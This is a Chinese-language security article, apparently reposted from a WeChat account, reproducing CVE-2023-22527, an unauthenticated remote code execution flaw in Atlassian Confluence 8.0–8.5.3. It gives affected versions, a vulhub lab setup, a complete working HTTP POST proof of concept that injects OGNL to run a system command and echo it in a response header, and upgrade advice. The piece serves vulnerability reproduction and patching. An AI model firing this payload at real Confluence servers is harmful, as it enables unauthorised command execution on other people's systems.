前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2023-22527:Confluence远程代码执行漏洞

CVE-2023-22527:Confluence远程代码执行漏洞

作者头像
Timeline Sec
发布2024-04-11 20:05:04
1130
发布2024-04-11 20:05:04
举报
文章被收录于专栏:Timeline SecTimeline Sec

0x01 简介

Atlassian Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。

0x02 漏洞概述

漏洞编号:

在Confluence 8.0到8.5.3版本之间,存在一处由于任意velocity模板被调用导致的OGNL表达式注入漏洞,未授权攻击者利用该漏洞可以直接攻击Confluence服务器并执行任意命令。

0x03 影响版本

8.0.x

8.1.x

8.2.x

8.3.x

8.4.x

8.5.0-8.5.3

安全版本:

Confluence Data Center and Server >= 8.5.4 (LTS)

Confluence Data Center >= 8.6.0 (Data Center Only)

Confluence Data Center >= 8.7.1 (Data Center Only)

0x04 环境搭建

直接使用vulhub起docker,找到vulhub/confluence/CVE-2023-22527,

docker-compose up -d

访问http://127.0.0.1:8090即可进入安装向导

去Atlassian官方申请一个Confluence Server的测试证书

https://www.atlassian.com/zh/try

申请试用版许可证。

生成licenses

获取对应license

搭建环境

在填写数据库信息的页面,PostgreSQL数据库地址为db,数据库名称confluence,用户名密码均为postgres

默认均为第一个选项

取名test

搭建完成

0x05 漏洞复现

回到攻击机,访问对应地址

poc如下

代码语言:javascript
复制
POST /template/aui/text-inline.vm HTTP/1.1 
Host: 192.168.217.130:8090 
Cache-Control: max-age=0 
Upgrade-Insecure-Requests: 1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 
Accept-Encoding: gzip, deflate 
Accept-Language: zh-CN,zh;q=0.9,th;q=0.8 
Cookie: JSESSIONID=001B30B8B02829BA586B87391DB9510E 
Connection: close 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 285 

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

0x06 修复方式

目前,官方已发布修复建议,建议受影响的用户尽快升级至安全版本。

下载地址:https://www.atlassian.com/zh/software/confluence/download-archives

参考链接

https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/

https://github.com/vulhub/vulhub/blob/master/confluence/CVE-2023-22527/README.zh-cn.md

https://blog.csdn.net/Fortinet_CHINA/article/details/125321120

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2024-03-29,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Timeline Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x01 简介
  • 0x02 漏洞概述
  • 0x03 影响版本
  • 0x04 环境搭建
  • 0x05 漏洞复现
  • 0x06 修复方式
  • 参考链接
相关产品与服务
数据库
云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档